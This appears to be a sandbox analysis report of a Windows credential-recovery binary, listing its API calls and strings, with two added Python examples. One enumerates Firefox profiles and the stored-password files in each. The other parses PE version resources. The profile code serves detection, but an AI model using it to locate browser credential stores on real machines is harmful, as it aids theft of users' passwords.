• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
• {Unknown}, xrefs: 004132A6
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
• API String ID: 829165378-0
APIs
• memset.MSVCRT ref: 00404172
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
• wcscpy.MSVCRT ref: 004041D6
• wcscpy.MSVCRT ref: 004041E7
• memset.MSVCRT ref: 00404200
• memset.MSVCRT ref: 00404215
• _snwprintf.MSVCRT ref: 0040422F
• wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 0040426E
• memset.MSVCRT ref: 004042CD
• memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
• API String ID: 2454223109-1580313836
                                                                                                                                                                                    • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                    • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
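The string set of this function (profiles.ini, General, Profile%d, IsRelative, Path) together with the GetFileAttributesW call is the Firefox profile-discovery step of a browser credential harvester: walk the [ProfileN] sections of profiles.ini, resolve each Path (relative to the profiles.ini directory when IsRelative is 1), and test that the directory exists. The following Python is an added example written for this page, not code recovered from the sample or produced by the sandbox; the profiles.ini text, the base directory and the list of credential files per profile are constructed assumptions for illustration.

```python
"""Firefox profile discovery as performed by browser credential harvesters.

Added example, not from the sandbox report or the analysed sample. It
reimplements the walk that the function above performs: iterate
[Profile%d] sections of profiles.ini, honour IsRelative, join Path onto
the profiles.ini directory, and list the credential files inside each
profile that such a tool goes on to read. The INI text, the base
directory and the file list are constructed for the example.
"""
import configparser
import ntpath
from typing import Dict, List

# Constructed sample profiles.ini, not taken from the analysed binary.
SAMPLE_PROFILES_INI = """\
[General]
StartWithLastProfile=1
Version=2

[Profile0]
Name=default-release
IsRelative=1
Path=Profiles/abcd1234.default-release
Default=1

[Profile1]
Name=portable
IsRelative=0
Path=D:\\FirefoxProfiles\\portable

[Install308046B0AF4A39CB]
Default=Profiles/abcd1234.default-release
Locked=1
"""

# Assumed location of profiles.ini on a typical Windows install (illustrative).
SAMPLE_INI_DIR = r"C:\Users\victim\AppData\Roaming\Mozilla\Firefox"

# Files a password-recovery tool reads from each profile: the encrypted
# logins store and the NSS key database that decrypts it, plus the legacy
# equivalents used by older Firefox versions.
CREDENTIAL_FILES = ("logins.json", "key4.db", "signons.sqlite", "key3.db")


def resolve_profile_dirs(ini_text: str, ini_dir: str) -> List[str]:
    """Return profile directories in Profile0, Profile1, ... order.

    Stops at the first missing [ProfileN] section, as a loop built on the
    "Profile%d" format string would. IsRelative=1 (the default) means Path
    is relative to the directory holding profiles.ini.
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep the IsRelative/Path key case
    cp.read_string(ini_text)
    dirs: List[str] = []
    n = 0
    while cp.has_section(f"Profile{n}"):
        section = f"Profile{n}"
        n += 1
        path = cp.get(section, "Path", fallback="")
        if not path:
            continue
        if cp.get(section, "IsRelative", fallback="1") == "1":
            path = ntpath.join(ini_dir, path.replace("/", "\\"))
        dirs.append(ntpath.normpath(path))
    return dirs


def credential_targets(ini_text: str, ini_dir: str) -> Dict[str, List[str]]:
    """Map each profile directory to the credential files a harvester reads."""
    return {
        d: [ntpath.join(d, name) for name in CREDENTIAL_FILES]
        for d in resolve_profile_dirs(ini_text, ini_dir)
    }


if __name__ == "__main__":
    for profile, files in credential_targets(SAMPLE_PROFILES_INI, SAMPLE_INI_DIR).items():
        print(profile)
        for f in files:
            print("   ", f)
```

For detection purposes the useful output is the second function: file-access telemetry showing a process other than firefox.exe opening logins.json and key4.db under a resolved profile directory is the observable that corresponds to this code path in the sample.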
APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
• API String ID: 4054529287-3175352466
• Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
• Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
• Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
• Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: wcscat$_snwprintfmemset$wcscpy
• String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
• API String ID: 3143752011-1996832678
• Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
• Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
• Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
• Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
• GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
• GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
• GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
• API String ID: 667068680-2887671607
• Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
• Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
• Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
• Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _snwprintfmemset$wcscpy$wcscat
• String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
• API String ID: 1607361635-601624466
• Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
• Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
• Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
• Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: _snwprintf$memset$wcscpy
• String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
• API String ID: 2000436516-3842416460
• Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
• Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
• Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
• Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1043902810-0
                                                                                                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                                                                                                    • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
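The APIs and strings attached to this function (\VarFileInfo\Translation, the %4.4X%4.4X format, the 040904E4 literal and the CompanyName … ProductVersion names) are the standard sequence for reading a PE's VS_VERSIONINFO string table: query the Translation array, format the language/codepage pair as an eight-hex-digit table key, then query each StringFileInfo\<key>\<name> entry. The Python below is an added example, not code from the sample or from this report: it serialises a constructed VS_VERSIONINFO blob and walks it in that order so the lookup can be reproduced offline. The function names, the constructed field values, and the use of 040904E4 as the fallback table when no Translation entry exists are assumptions.

```python
import struct

# String names the function looks up, per its String ID on the page.
VERSION_STRING_NAMES = (
    "CompanyName", "FileDescription", "FileVersion", "InternalName",
    "LegalCopyright", "OriginalFileName", "ProductName", "ProductVersion",
)
# US English (0x0409) / Windows-1252 (0x04E4). The literal "040904E4" is on the
# page; treating it as the fallback when Translation is absent is an assumption.
DEFAULT_TRANSLATION = "040904E4"

# Constructed sample values for the StringTable; not taken from any real binary.
SAMPLE_STRINGS = {
    "CompanyName": "Example Corp", "FileDescription": "Example Browser",
    "FileVersion": "1.2.3.4", "InternalName": "browser",
    "LegalCopyright": "(c) Example Corp", "OriginalFileName": "browser.exe",
    "ProductName": "Example Browser", "ProductVersion": "1.2",
}


def _pad4(n):
    return (-n) % 4


def build_node(key, value=b"", text=False, children=()):
    """Serialize one VS_VERSIONINFO node: wLength, wValueLength, wType, szKey,
    32-bit padding, Value, then 32-bit padded Children. Every node starts on a
    4-byte boundary relative to the blob, so node-relative padding is valid."""
    out = bytearray(6) + key.encode("utf-16-le") + b"\x00\x00"
    out += b"\x00" * _pad4(len(out))
    out += value
    for child in children:
        out += b"\x00" * _pad4(len(out))
        out += child
    w_value_len = len(value) // 2 if text else len(value)  # text lengths are in WCHARs
    struct.pack_into("<HHH", out, 0, len(out), w_value_len, 1 if text else 0)
    return bytes(out)


def parse_node(buf, off=0):
    """Parse the node at `off`; return (node, end_offset). Raises on malformed input."""
    w_len, w_value_len, w_type = struct.unpack_from("<HHH", buf, off)
    end = off + w_len
    if w_len < 6 or end > len(buf):
        raise ValueError("bad node length at offset %d" % off)
    p = off + 6
    k = p
    while k < end and buf[k:k + 2] != b"\x00\x00":  # szKey is NUL-terminated UTF-16LE
        k += 2
    key = buf[p:k].decode("utf-16-le")
    p = k + 2 + _pad4(k + 2)
    value_len = w_value_len * 2 if w_type == 1 else w_value_len
    value = bytes(buf[p:p + value_len])
    p += value_len
    children = []
    while True:
        p += _pad4(p)
        if p >= end:
            break
        child, p = parse_node(buf, p)
        children.append(child)
    return {"key": key, "value": value, "children": children}, end


def query_value(root, path):
    """Emulate VerQueryValueW for a sub-block path such as \\VarFileInfo\\Translation."""
    node = root
    for part in path.strip("\\").split("\\"):
        node = next((c for c in node["children"] if c["key"].lower() == part.lower()), None)
        if node is None:
            return None
    return node["value"]


def translation_key(root):
    """First Translation entry formatted like the page's "%4.4X%4.4X", else the fallback."""
    trans = query_value(root, "\\VarFileInfo\\Translation")
    if trans is None or len(trans) < 4:
        return DEFAULT_TRANSLATION
    lang, codepage = struct.unpack_from("<HH", trans, 0)
    return "%4.4X%4.4X" % (lang, codepage)


def read_version_strings(blob, names=VERSION_STRING_NAMES):
    """Return {name: value} for every requested StringFileInfo entry present in the blob."""
    root, _ = parse_node(blob)
    table = translation_key(root)
    found = {}
    for name in names:
        raw = query_value(root, "\\StringFileInfo\\%s\\%s" % (table, name))
        if raw is not None:
            found[name] = raw.decode("utf-16-le").rstrip("\x00")
    return found


def build_sample_blob(with_translation=True, lang=0x0409, codepage=0x04E4):
    """Constructed VS_VERSIONINFO resource: fixed info, one StringTable, optional Translation."""
    fixed = struct.pack("<13I", 0xFEEF04BD, 0x00010000, *([0] * 11))  # VS_FIXEDFILEINFO, 52 bytes
    strings = [build_node(n, (v + "\x00").encode("utf-16-le"), text=True)
               for n, v in SAMPLE_STRINGS.items()]
    table = build_node("%4.4X%4.4X" % (lang, codepage), text=True, children=strings)
    children = [build_node("StringFileInfo", text=True, children=[table])]
    if with_translation:
        var = build_node("Translation", struct.pack("<HH", lang, codepage))
        children.append(build_node("VarFileInfo", text=True, children=[var]))
    return build_node("VS_VERSION_INFO", fixed, children=children)
```

Calling `read_version_strings(build_sample_blob())` returns all eight constructed strings. The two failure modes worth noting when reversing code like this: a Translation entry that does not match any StringTable key (the query returns nothing), and a missing VarFileInfo block, which is the case where a hard-coded key such as 040904E4 decides whether anything is read at all.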
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                    • API String ID: 3330709923-517860148
                                                                                                                                                                                    • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                    • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                    • memset.MSVCRT ref: 004081E4
